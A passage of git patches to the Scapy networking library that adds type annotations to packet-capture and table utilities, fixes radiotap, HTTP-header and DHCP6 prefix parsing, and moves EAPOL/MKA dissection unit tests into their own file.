if usec is None: usec = 0 - rawpkt = raw(packet) + rawpkt = bytes_encode(packet) caplen = len(rawpkt) if caplen is None else caplen if wirelen is None: if hasattr(packet, "wirelen"): - wirelen = packet.wirelen + wirelen = packet.wirelen # type: ignore if wirelen is None: wirelen = caplen - RawPcapWriter._write_packet( - self, rawpkt, sec=sec, usec=usec, caplen=caplen, wirelen=wirelen) + self._write_packet( + rawpkt, + sec=sec, usec=usec, + caplen=caplen, wirelen=wirelen + ) @conf.commands.register def import_hexcap(input_string=None): + # type: (Optional[str]) -> bytes """Imports a tcpdump like hexadecimal view e.g: exported via hexdump() or tcpdump or wireshark's "export as hex" @@ -1618,7 +1845,7 @@ def import_hexcap(input_string=None): if not line: break try: - p += re_extract_hexcap.match(line).groups()[2] + p += re_extract_hexcap.match(line).groups()[2] # type: ignore except Exception: warning("Parsing error during hexcap") continue @@ -1631,6 +1858,7 @@ def import_hexcap(input_string=None): @conf.commands.register def wireshark(pktlist, wait=False, **kwargs): + # type: (List[Packet], bool, **Any) -> Optional[Any] """ Runs Wireshark on a list of packets. @@ -1642,7 +1870,12 @@ def wireshark(pktlist, wait=False, **kwargs): @conf.commands.register -def tdecode(pktlist, args=None, **kwargs): +def tdecode( + pktlist, # type: Union[IO[bytes], None, str, _UniPacketList] + args=None, # type: Optional[List[str]] + **kwargs # type: Any +): + # type: (...) -> Any """ Run tshark on a list of packets. @@ -1656,27 +1889,41 @@ def tdecode(pktlist, args=None, **kwargs): def _guess_linktype_name(value): + # type: (int) -> str """Guess the DLT name from its value.""" import scapy.data - return next( + return next( # type: ignore k[4:] for k, v in six.iteritems(scapy.data.__dict__) if k.startswith("DLT") and v == value ) def _guess_linktype_value(name): + # type: (str) -> int """Guess the value of a DLT name.""" import scapy.data if not name.startswith("DLT_"): name = "DLT_" + name - return scapy.data.__dict__[name] + return scapy.data.__dict__[name] # type: ignore @conf.commands.register -def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, - prog=None, getproc=False, quiet=False, use_tempfile=None, - read_stdin_opts=None, linktype=None, wait=True, - _suppress=False): +def tcpdump( + pktlist=None, # type: Union[IO[bytes], None, str, _UniPacketList] + dump=False, # type: bool + getfd=False, # type: bool + args=None, # type: Optional[List[str]] + flt=None, # type: Optional[str] + prog=None, # type: Optional[Any] + getproc=False, # type: bool + quiet=False, # type: bool + use_tempfile=None, # type: Optional[Any] + read_stdin_opts=None, # type: Optional[Any] + linktype=None, # type: Optional[Any] + wait=True, # type: bool + _suppress=False # type: bool +): + # type: (...) -> Any """Run tcpdump or tshark on a list of packets. When using ``tcpdump`` on OSX (``prog == conf.prog.tcpdump``), this uses a @@ -1848,10 +2095,17 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, stderr=stderr, ) elif use_tempfile: - tmpfile = get_temp_file(autoext=".pcap", fd=True) + pktlist = cast(Union[IO[bytes], _UniPacketList], pktlist) + tmpfile = get_temp_file( # type: ignore + autoext=".pcap", + fd=True + ) # type: IO[bytes] try: - tmpfile.writelines(iter(lambda: pktlist.read(1048576), b"")) + tmpfile.writelines( + iter(lambda: pktlist.read(1048576), b"") # type: ignore + ) except AttributeError: + pktlist = cast(_UniPacketList, pktlist) wrpcap(tmpfile, pktlist, linktype=linktype) else: tmpfile.close() @@ -1863,12 +2117,12 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, ) else: try: - pktlist.fileno() + pktlist.fileno() # type: ignore # pass the packet stream with ContextManagerSubprocess(prog[0], suppress=_suppress): proc = subprocess.Popen( prog + read_stdin_opts + args, - stdin=pktlist, + stdin=pktlist, # type: ignore stdout=stdout, stderr=stderr, ) @@ -1885,19 +2139,23 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, # An error has occurred return try: - proc.stdin.writelines(iter(lambda: pktlist.read(1048576), b"")) + proc.stdin.writelines( # type: ignore + iter(lambda: pktlist.read(1048576), b"") # type: ignore + ) except AttributeError: - wrpcap(proc.stdin, pktlist, linktype=linktype) + wrpcap(proc.stdin, pktlist, linktype=linktype) # type: ignore except UnboundLocalError: # The error was handled by ContextManagerSubprocess pass else: - proc.stdin.close() + proc.stdin.close() # type: ignore if proc is None: # An error has occurred return if dump: - return b"".join(iter(lambda: proc.stdout.read(1048576), b"")) + return b"".join( + iter(lambda: proc.stdout.read(1048576), b"") # type: ignore + ) if getproc: return proc if getfd: @@ -1908,17 +2166,19 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, @conf.commands.register def hexedit(pktlist): + # type: (_UniPacketList) -> PacketList """Run hexedit on a list of packets, then return the edited packets.""" - f = get_temp_file() + f = get_temp_file() # type: str # type: ignore wrpcap(f, pktlist) with ContextManagerSubprocess(conf.prog.hexedit): subprocess.call([conf.prog.hexedit, f]) - pktlist = rdpcap(f) + rpktlist = rdpcap(f) os.unlink(f) - return pktlist + return rpktlist def get_terminal_width(): + # type: () -> Optional[int] """Get terminal width (number of characters) if in a window. Notice: this will try several methods in order to @@ -1926,6 +2186,7 @@ def get_terminal_width(): """ # Let's first try using the official API # (Python 3.3+) + sizex = None # type: Optional[int] if not six.PY2: import shutil sizex = shutil.get_terminal_size(fallback=(0, 0))[0] @@ -1933,7 +2194,7 @@ def get_terminal_width(): return sizex # Backups / Python 2.7 if WINDOWS: - from ctypes import windll, create_string_buffer + from ctypes import windll, create_string_buffer # type: ignore # http://code.activestate.com/recipes/440694-determine-size-of-console-window-on-windows/ h = windll.kernel32.GetStdHandle(-12) csbi = create_string_buffer(22) @@ -1944,10 +2205,9 @@ def get_terminal_width(): sizex = right - left + 1 # sizey = bottom - top + 1 return sizex - return None + return sizex else: # We have various methods - sizex = None # COLUMNS is set on some terminals try: sizex = int(os.environ['COLUMNS']) @@ -1967,7 +2227,12 @@ def get_terminal_width(): return sizex -def pretty_list(rtlst, header, sortBy=0, borders=False): +def pretty_list(rtlst, # type: List[Tuple[Union[str, List[str]], ...]] + header, # type: List[Tuple[str, ...]] + sortBy=0, # type: int + borders=False, # type: bool + ): + # type: (...) -> str """ Pretty list to fit the terminal, and add header. @@ -1989,8 +2254,8 @@ def pretty_list(rtlst, header, sortBy=0, borders=False): rtlst.sort(key=lambda x: x[sortBy]) # Resolve multi-values for i, line in enumerate(rtlst): - ids = [] - values = [] + ids = [] # type: List[int] + values = [] # type: List[Union[str, List[str]]] for j, val in enumerate(line): if isinstance(val, list): ids.append(j) @@ -1999,15 +2264,19 @@ def pretty_list(rtlst, header, sortBy=0, borders=False): del rtlst[i] k = 0 for ex_vals in zip_longest(*values, fillvalue=" "): - extra_line = ([" "] * cols) if k else list(line) + if k: + extra_line = [" "] * cols + else: + extra_line = list(line) # type: ignore for j, h in enumerate(ids): extra_line[h] = ex_vals[j] rtlst.insert(i + k, tuple(extra_line)) k += 1 + rtslst = cast(List[Tuple[str, ...]], rtlst) # Append tag - rtlst = header + rtlst + rtslst = header + rtslst # Detect column's width - colwidth = [max(len(y) for y in x) for x in zip(*rtlst)] + colwidth = [max(len(y) for y in x) for x in zip(*rtslst)] # Make text fit in box (if required) width = get_terminal_width() if conf.auto_crop_tables and width: @@ -2018,13 +2287,13 @@ def pretty_list(rtlst, header, sortBy=0, borders=False): # Get the longest row i = colwidth.index(max(colwidth)) # Get all elements of this row - row = [len(x[i]) for x in rtlst] + row = [len(x[i]) for x in rtslst] # Get biggest element of this row: biggest of the array j = row.index(max(row)) # Re-build column tuple with the edited element - t = list(rtlst[j]) + t = list(rtslst[j]) t[i] = t[i][:-2] + "_" - rtlst[j] = tuple(t) + rtslst[j] = tuple(t) # Update max size row[j] = len(t[i]) colwidth[i] = max(row) @@ -2034,17 +2303,28 @@ def pretty_list(rtlst, header, sortBy=0, borders=False): fmt = _space.join(["%%-%ds" % x for x in colwidth]) # Append separation line if needed if borders: - rtlst.insert(1, tuple("-" * x for x in colwidth)) + rtslst.insert(1, tuple("-" * x for x in colwidth)) # Compile - return "\n".join(fmt % x for x in rtlst) - - -def __make_table(yfmtfunc, fmtfunc, endline, data, fxyz, sortx=None, sorty=None, seplinefunc=None, dump=False): # noqa: E501 + return "\n".join(fmt % x for x in rtslst) + + +def __make_table( + yfmtfunc, # type: Callable[[int], str] + fmtfunc, # type: Callable[[int], str] + endline, # type: str + data, # type: List[Tuple[Packet, Packet]] + fxyz, # type: Callable[[Packet, Packet], Tuple[Any, Any, Any]] + sortx=None, # type: Optional[Callable[[str], Tuple[Any, ...]]] + sorty=None, # type: Optional[Callable[[str], Tuple[Any, ...]]] + seplinefunc=None, # type: Optional[Callable[[int, List[int]], str]] + dump=False # type: bool +): + # type: (...) -> Optional[str] """Core function of the make_table suite, which generates the table""" - vx = {} - vy = {} - vz = {} - vxf = {} + vx = {} # type: Dict[str, int] + vy = {} # type: Dict[str, Optional[int]] + vz = {} # type: Dict[Tuple[str, str], str] + vxf = {} # type: Dict[str, str] # Python 2 backward compatibility fxyz = lambda_tuple_converter(fxyz) @@ -2109,20 +2389,44 @@ def __make_table(yfmtfunc, fmtfunc, endline, data, fxyz, sortx=None, sorty=None, return s else: print(s, end="") + return None def make_table(*args, **kargs): - return __make_table(lambda l: "%%-%is" % l, lambda l: "%%-%is" % l, "", *args, **kargs) # noqa: E501 + # type: (*Any, **Any) -> Optional[Any] + return __make_table( + lambda l: "%%-%is" % l, + lambda l: "%%-%is" % l, + "", + *args, + **kargs + ) def make_lined_table(*args, **kargs): - return __make_table(lambda l: "%%-%is |" % l, lambda l: "%%-%is |" % l, "", - seplinefunc=lambda a, x: "+".join('-' * (y + 2) for y in [a - 1] + x + [-2]), # noqa: E501 - *args, **kargs) + # type: (*Any, **Any) -> Optional[str] + return __make_table( # type: ignore + lambda l: "%%-%is |" % l, + lambda l: "%%-%is |" % l, + "", + *args, + seplinefunc=lambda a, x: "+".join( + '-' * (y + 2) for y in [a - 1] + x + [-2] + ), + **kargs + ) def make_tex_table(*args, **kargs): - return __make_table(lambda l: "%s", lambda l: "& %s", "\\\\", seplinefunc=lambda a, x: "\\hline", *args, **kargs) # noqa: E501 + # type: (*Any, **Any) -> Optional[str] + return __make_table( # type: ignore + lambda l: "%s", + lambda l: "& %s", + "\\\\", + *args, + seplinefunc=lambda a, x: "\\hline", + **kargs + ) #################### # WHOIS CLIENT # @@ -2130,6 +2434,7 @@ def make_tex_table(*args, **kargs): def whois(ip_address): + # type: (str) -> bytes """Whois client for Python""" whois_ip = str(ip_address) try: @@ -2164,6 +2469,7 @@ def whois(ip_address): class PeriodicSenderThread(threading.Thread): def __init__(self, sock, pkt, interval=0.5): + # type: (Any, Packet, float) -> None """ Thread to send packets periodically Args: @@ -2178,34 +2484,42 @@ def __init__(self, sock, pkt, interval=0.5): threading.Thread.__init__(self) def run(self): + # type: () -> None while not self._stopped.is_set(): self._socket.send(self._pkt) time.sleep(self._interval) def stop(self): + # type: () -> None self._stopped.set() class SingleConversationSocket(object): def __init__(self, o): + # type: (Any) -> None self._inner = o self._tx_mutex = threading.RLock() @property - def __dict__(self): + def __dict__(self): # type: ignore + # type: () -> Any return self._inner.__dict__ def __getattr__(self, name): + # type: (str) -> Any return getattr(self._inner, name) def sr1(self, *args, **kargs): + # type: (*Any, **Any) -> Any with self._tx_mutex: return self._inner.sr1(*args, **kargs) def sr(self, *args, **kargs): + # type: (*Any, **Any) -> Any with self._tx_mutex: return self._inner.sr(*args, **kargs) def send(self, x): + # type: (Packet) -> Any with self._tx_mutex: return self._inner.send(x) From e3462561c7301605d177734a58176dfdb3c4136c Mon Sep 17 00:00:00 2001 From: Mathy Vanhoef Date: Tue, 14 Jul 2020 00:16:52 +0400 Subject: [PATCH 0329/1632] radiotap: add support for fixed order Tx flag --- scapy/layers/dot11.py | 2 +- test/regression.uts | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index b4efc99b47a..828c9df9be4 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -211,7 +211,7 @@ def guess_payload_class(self, pay): _rt_rxflags = ["res1", "BAD_PLCP", "res2"] -_rt_txflags = ["TX_FAIL", "CTS", "RTS", "NOACK", "NOSEQ"] +_rt_txflags = ["TX_FAIL", "CTS", "RTS", "NOACK", "NOSEQ", "ORDER"] _rt_channelflags2 = ['res1', 'res2', 'res3', 'res4', 'Turbo', 'CCK', 'OFDM', '2GHz', '5GHz', 'Passive', 'Dynamic_CCK_OFDM', diff --git a/test/regression.uts b/test/regression.uts index a2461dd1031..da49f93e50d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1349,7 +1349,7 @@ assert r.MCS_index == 5 assert r.Ness_LSB == 0 = RadioTap RX/TX Flags dissection -data = b'\x00\x00\x0c\x00\x00\xc0\x00\x00\x02\x00\x1f\x00' +data = b'\x00\x00\x0c\x00\x00\xc0\x00\x00\x02\x00\x3f\x00' r = RadioTap(data) r.show() assert r.present.TXFlags @@ -1358,6 +1358,7 @@ assert r.TXFlags.CTS assert r.TXFlags.RTS assert r.TXFlags.NOACK assert r.TXFlags.NOSEQ +assert r.TXFlags.ORDER assert r.present.RXFlags assert r.RXFlags.BAD_PLCP From fd0f232be3a584748ed3e70cd2d701d9ce955d2f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 10 Oct 2020 21:45:41 +0200 Subject: [PATCH 0330/1632] Fix HTTP duplicated fields --- scapy/layers/http.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index c01bed120fa..2e70546f022 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -132,7 +132,6 @@ ] COMMON_UNSTANDARD_REQUEST_HEADERS = [ - "Upgrade-Insecure-Requests", "Upgrade-Insecure-Requests", "X-Requested-With", "DNT", @@ -173,7 +172,6 @@ "Last-Modified", "Link", "Location", - "Permanent", "P3P", "Proxy-Authenticate", "Public-Key-Pins", From 308327f0bea599846c3f6f412c747df58b11eea3 Mon Sep 17 00:00:00 2001 From: Bharadwaj Avva Date: Tue, 20 Oct 2020 03:15:34 +0000 Subject: [PATCH 0331/1632] dhcp6: Make prefixes in DHCP6OptIA_PD.iapdopt get parsed as list Although DHCP6OptIA_PD.iapdopt is defined as PacketListField, scapy is parsing one DHCP6OptIAPrefix option as the payload of the previous prefix option. This patch fixes that by telling scapy that there is no payload to DHCP6OptIAPrefix option. This is similar to how the same problem is handled with DHCP6OptIAAddress options. Testing: Added unit tests. Without this patch: \iapdopt \ |###[ DHCP6 Option - IA_PD Prefix option ]### | optcode = OPTION_IAPREFIX | optlen = 25 | preflft = 150 | validlft = 450 | plen = 80 | prefix = ::1:0:0:0 | iaprefopts= '' |###[ DHCP6 Option - IA_PD Prefix option ]### | optcode = OPTION_IAPREFIX | optlen = 25 | preflft = 0 | validlft = 0 | plen = 80 | prefix = ::2:0:0:0 | iaprefopts= '' With this patch: \iapdopt \ |###[ DHCP6 Option - IA_PD Prefix option ]### | optcode = OPTION_IAPREFIX | optlen = 25 | preflft = 150 | validlft = 450 | plen = 80 | prefix = ::1:0:0:0 | iaprefopts= '' |###[ DHCP6 Option - IA_PD Prefix option ]### | optcode = OPTION_IAPREFIX | optlen = 25 | preflft = 0 | validlft = 0 | plen = 80 | prefix = ::2:0:0:0 | iaprefopts= '' Signed-off-by: Bharadwaj Avva --- scapy/layers/dhcp6.py | 3 +++ test/scapy/layers/dhcp6.uts | 36 ++++++++++++++++++++++++++++++++---- 2 files changed, 35 insertions(+), 4 deletions(-) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 63a51048baf..ee5bff1f0ae 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -776,6 +776,9 @@ class DHCP6OptIAPrefix(_DHCP6OptGuessPayload): # RFC 8415 sect 21.22 _DHCP6OptGuessPayloadElt, length_from=lambda pkt: pkt.optlen - 25)] + def guess_payload_class(self, payload): + return conf.padding_layer + class DHCP6OptIA_PD(_DHCP6OptGuessPayload): # RFC 8415 sect 21.21 name = "DHCP6 Option - Identity Association for Prefix Delegation" diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index a6255aca066..4558cd227fb 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -652,7 +652,19 @@ a.optcode == 24 and a.optlen == 36 and len(a.dnsdomains) == 2 and a.dnsdomains[0 = DHCP6OptIAPrefix - Basic Instantiation raw(DHCP6OptIAPrefix()) == b'\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -#TODO : finish me += DHCP6OptIAPrefix - Basic Dissection +a = DHCP6OptIAPrefix(b'\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 26 and a.optlen == 25 and a.prefix == "2001:db8::" and a.plen == 48 and a.preflft == 0 and a. validlft == 0 and a.iaprefopts == [] + += DHCP6OptIAPrefix - Instantiation with specific values +raw(DHCP6OptIAPrefix(optlen=0x1111, prefix="1111:2222:3333:4444::", plen=64, preflft=0x66666666, validlft=0x77777777, iaprefopts="somestring")) == b'\x00\x1a\x11\x11ffffwwww@\x11\x11""33DD\x00\x00\x00\x00\x00\x00\x00\x00somestring' + += DHCP6OptIAPrefix - Instantiation with specific values (default optlen computation) +raw(DHCP6OptIAPrefix(prefix="1111:2222:3333:4444::", plen=64, preflft=0x66666666, validlft=0x77777777, iaprefopts="somestring")) == b'\x00\x1a\x00#ffffwwww@\x11\x11""33DD\x00\x00\x00\x00\x00\x00\x00\x00somestring' + += DHCP6OptIAPrefix - Dissection with specific values +a = DHCP6OptIAPrefix(b'\x00\x1a\x00#ffffwwww@\x11\x11""33DD\x00\x00\x00\x00\x00\x00\x00\x00somerawing') +a.optcode == 26 and a.optlen == 35 and a.prefix == "1111:2222:3333:4444::" and a.plen == 64 and a.preflft == 0x66666666 and a.validlft == 0x77777777 and a.iaprefopts[0].load == b"somerawing" ############ @@ -662,10 +674,26 @@ raw(DHCP6OptIAPrefix()) == b'\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \ = DHCP6OptIA_PD - Basic Instantiation raw(DHCP6OptIA_PD()) == b'\x00\x19\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -= DHCP6OptIA_PD - Instantiation with a list of different opts: IA Address and Status Code (optlen automatic computation) -raw(DHCP6OptIA_PD(iaid=0x22222222, T1=0x33333333, T2=0x44444444, iapdopt=[DHCP6OptIAAddress(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x19\x003""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' += DHCP6OptIA_PD - Basic Dissection +a = DHCP6OptIA_PD(b'\x00\x19\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 25 and a.optlen == 12 and a.iaid == 0 and a.T1 == 0 and a.T2==0 and a.iapdopt == [] + += DHCP6OptIA_PD - Instantiation with specific values (keep automatic length computation) +print(raw(DHCP6OptIA_PD(iaid=0x22222222, T1=0x33333333, T2=0x44444444))) +raw(DHCP6OptIA_PD(iaid=0x22222222, T1=0x33333333, T2=0x44444444)) == b'\x00\x19\x00\x0c""""3333DDDD' + += DHCP6OptIA_PD - Instantiation with specific values (forced optlen) +raw(DHCP6OptIA_PD(optlen=0x1111, iaid=0x22222222, T1=0x33333333, T2=0x44444444)) == b'\x00\x19\x11\x11""""3333DDDD' + += DHCP6OptIA_PD - Instantiation with a list of IA Prefixes (optlen automatic computation) +raw(DHCP6OptIA_PD(iaid=0x22222222, T1=0x33333333, T2=0x44444444, iapdopt=[DHCP6OptIAPrefix(), DHCP6OptIAPrefix()])) == b'\x00\x19\x00F""""3333DDDD\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptIA_PD - Dissection with specific values +a = DHCP6OptIA_PD(b'\x00\x19\x00N""""3333DDDD\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 25 and a.optlen == 78 and a.iaid == 0x22222222 and a.T1 == 0x33333333 and a.T2==0x44444444 and len(a.iapdopt) == 2 and isinstance(a.iapdopt[0], DHCP6OptIAPrefix) and isinstance(a.iapdopt[1], DHCP6OptIAPrefix) -#TODO : finish me += DHCP6OptIA_PD - Instantiation with a list of different opts: IA Prefix and Status Code (optlen automatic computation) +raw(DHCP6OptIA_PD(iaid=0x22222222, T1=0x33333333, T2=0x44444444, iapdopt=[DHCP6OptIAPrefix(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x19\x004""""3333DDDD\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' ############ From 3a6cb7c90a6bcd6d5e93bd3ce612010b7b81926f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 19 Oct 2020 12:57:26 +0200 Subject: [PATCH 0332/1632] Standalone EAP unit tests Co-authored-by: Pierre Lorinquer Co-authored-by: gpotter2 Co-authored-by: Pierre LALET Co-authored-by: Adam Karpierz --- test/regression.uts | 392 ------------------------------------- test/scapy/layers/eap.uts | 393 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 393 insertions(+), 392 deletions(-) create mode 100644 test/scapy/layers/eap.uts diff --git a/test/regression.uts b/test/regression.uts index da49f93e50d..64dc8f36e36 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7739,398 +7739,6 @@ assert s.rootmac == "12:13:14:15:16:17" assert s.bridgemac == "aa:aa:aa:aa:aa:aa" assert s.hellotime == 5 -############ -############ -+ EAPOL class tests - -= EAPOL - Basic Instantiation -raw(EAPOL()) == b'\x01\x00\x00\x00' - -= EAPOL - Instantiation with specific values -raw(EAPOL(version = 3, type = 5)) == b'\x03\x05\x00\x00' - -= EAPOL - Dissection (1) -s = b'\x03\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 1) -assert(eapol.len == 0) - -= EAPOL - Dissection (2) -s = b'\x03\x00\x00\x05\x01\x01\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 0) -assert(eapol.len == 5) - -= EAPOL - Dissection (3) -s = b'\x03\x00\x00\x0e\x02\x01\x00\x0e\x01anonymous\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 0) -assert(eapol.len == 14) - -= EAPOL - Dissection (4) -req = EAPOL(b'\x03\x00\x00\x05\x01\x01\x00\x05\x01') -ans = EAPOL(b'\x03\x00\x00\x0e\x02\x01\x00\x0e\x01anonymous') -ans.answers(req) - -= EAPOL - Dissection (5) -s = b'\x02\x00\x00\x06\x01\x01\x00\x06\r ' -eapol = EAPOL(s) -assert(eapol.version == 2) -assert(eapol.type == 0) -assert(eapol.len == 6) -assert(eapol.haslayer(EAP_TLS)) - -= EAPOL - Dissection (6) -s = b'\x03\x00\x00<\x02\x9e\x00<+\x01\x16\x03\x01\x001\x01\x00\x00-\x03\x01dr1\x93ZS\x0en\xad\x1f\xbaH\xbb\xfe6\xe6\xd0\xcb\xec\xd7\xc0\xd7\xb9\xa5\xc9\x0c\xfd\x98o\xa7T \x00\x00\x04\x004\x00\x00\x01\x00\x00\x00' -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 0) -assert(eapol.len == 60) -assert(eapol.haslayer(EAP_FAST)) - - -############ -############ -+ EAPOL-MKA class tests - -= EAPOL-MKA - With Basic parameter set - Dissection -eapol = None -s = b'\x03\x05\x00T\x01\xff\xf0<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x01\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xff\x00\x00\x10\xe5\xf5j\x86V\\\xb1\xcc\xa9\xb95\x04m*Cj' -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 84) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"\xe5\xf5j\x86V\\\xb1\xcc\xa9\xb95\x04m*Cj") - - -= EAPOL-MKA - With Potential Peer List parameter set - Dissection -eapol = None -s = b'\x03\x05\x00h\x01\x10\xe0<\xccN$\xc4\xf7\x7f\x00\x80q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00}\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x02\x00\x00\x10\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x01\xff\x00\x00\x105\x01\xdc)\xfd\xd1\xff\xd55\x9c_o\xc9\x9c\xca\xc0' -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 104) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKAPotentialPeerListParamSet)) -assert(eapol[MKAPDU][MKAPotentialPeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"5\x01\xdc)\xfd\xd1\xff\xd55\x9c_o\xc9\x9c\xca\xc0") - -= EAPOL-MKA - With Live Peer List parameter set - Dissection -eapol = None -s = b"\x03\x05\x00h\x01\xffp<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x02\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x01\x00\x00\x10q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x80\xff\x00\x00\x10\xf4\xa1d\x18\tD\xa2}\x8e'\x0c/\xda,\xea\xb7" -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 104) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7') -assert(eapol.haslayer(MKALivePeerListParamSet)) -assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"\xf4\xa1d\x18\tD\xa2}\x8e'\x0c/\xda,\xea\xb7") - -= EAPOL-MKA - With SAK Use parameter set - Dissection -eapol = None -s = b'\x03\x05\x00\x94\x01\xffp<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x03\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x03\x10\x00(q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x10q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x83\xff\x00\x00\x10OF\x84\xf1@%\x95\xe6Fw9\x1a\xfa\x03(\xae' 